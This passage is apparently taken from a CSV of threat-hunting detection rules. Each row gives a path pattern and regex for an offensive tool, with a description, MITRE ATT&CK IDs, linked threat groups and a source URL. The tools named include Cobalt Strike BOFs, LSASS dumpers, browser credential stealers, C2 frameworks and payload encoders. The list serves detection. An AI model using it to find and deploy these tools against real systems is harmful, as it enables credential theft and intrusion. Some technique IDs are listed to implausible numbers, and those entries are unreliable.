T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10799" "*/ServiceMove-BOF/*",".{0,1000}\/ServiceMove\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","10800" "*/ServiceName:TokenDriver*",".{0,1000}\/ServiceName\:TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","10801" "*/Services/TransitEXE.exe*",".{0,1000}\/Services\/TransitEXE\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","10802" "*/servicetags.nse*",".{0,1000}\/servicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10803" "*/SessionExec.exe*",".{0,1000}\/SessionExec\.exe.{0,1000}","offensive_tool_keyword","SessionExec","Execute commands in other Sessions","T1053 - T1569","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/SessionExec","1","1","N/A","N/A","10","1","86","14","2024-07-29T12:24:28Z","2024-07-21T15:32:07Z","10804" "*/SessionGopher.git*",".{0,1000}\/SessionGopher\.git.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. 
It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","10805" "*/SessionGopher.ps1*",".{0,1000}\/SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10806" "*/SessionGopher.ps1*",".{0,1000}\/SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. 
It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","10807" "*/SessionSearcher.exe*",".{0,1000}\/SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10808" "*/SessionSearcher.exe*",".{0,1000}\/SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","10809" "*/SetNTLM.ps1*",".{0,1000}\/SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","10812" 
"*/SetProcessInjection.git*",".{0,1000}\/SetProcessInjection\.git.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","10813" "*/setuserpass.x64.*",".{0,1000}\/setuserpass\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - 
Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10815" "*/setuserpass.x86.*",".{0,1000}\/setuserpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","10816" "*/sfp_openphish.py*",".{0,1000}\/sfp_openphish\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT 
Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","10817" "*/sfp_spider.py*",".{0,1000}\/sfp_spider\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","10818" "*/sgn_linux-amd64.zip*",".{0,1000}\/sgn_linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10822" "*/sgn_linux-arm64.zip*",".{0,1000}\/sgn_linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10823" "*/sgn_windows-amd64.exe*",".{0,1000}\/sgn_windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10824" "*/sgn_windows-amd64.zip*",".{0,1000}\/sgn_windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10825" "*/sgn32.exe*",".{0,1000}\/sgn32\.exe.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate 
payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","1","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","10826" "*/sh_executor/*.go*",".{0,1000}\/sh_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","10827" "*/s-h-3-l-l/*",".{0,1000}\/s\-h\-3\-l\-l\/.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","10828" "*/shad0w.deb*",".{0,1000}\/shad0w\.deb.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10829" "*/shad0w.py*",".{0,1000}\/shad0w\.py.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10830" "*/shad0w.scr*",".{0,1000}\/shad0w\.scr.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored 
environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10831" "*/shad0w/beacon/beacon.dll*",".{0,1000}\/shad0w\/beacon\/beacon\.dll.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","10832" "*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10833" "*/shadowcoerce.py*",".{0,1000}\/shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10834" "*/ShadowDumper.git*",".{0,1000}\/ShadowDumper\.git.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","10835" 
"*/ShadowDumper/releases/download/*",".{0,1000}\/ShadowDumper\/releases\/download\/.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","10836" "*/ShadowForgeC2*",".{0,1000}\/ShadowForgeC2.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","10837" "*/ShadowHound.git*",".{0,1000}\/ShadowHound\.git.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","10838" "*/ShadowSpray.exe*",".{0,1000}\/ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10849" "*/ShadowSpray.git*",".{0,1000}\/ShadowSpray\.git.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","10850" "*/ShadowSpray.git*",".{0,1000}\/ShadowSpray\.git.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","1","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","10851" "*/ShadowSpray/*.cs*",".{0,1000}\/ShadowSpray\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black 
Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","10852" "*/ShadowStealer.git*",".{0,1000}\/ShadowStealer\.git.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","","N/A","","","","10853" "*/ShadowTech Rat.exe*",".{0,1000}\/ShadowTech\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10854" "*/share/gsocket/*",".{0,1000}\/share\/gsocket\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","10855" "*/share/windows-resources/wce*",".{0,1000}\/share\/windows\-resources\/wce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","#linux","N/A","8","4","N/A","N/A","N/A","N/A","10856" "*/share_enum.py*",".{0,1000}\/share_enum\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","10857" "*/shareaudit.exe*",".{0,1000}\/shareaudit\.exe.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","10858" "*/ShareAudit.git*",".{0,1000}\/ShareAudit\.git.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares 
in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","10859" "*/ShareAudit/releases/download/*",".{0,1000}\/ShareAudit\/releases\/download\/.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","10860" "*/ShareFinder.cs*",".{0,1000}\/ShareFinder\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 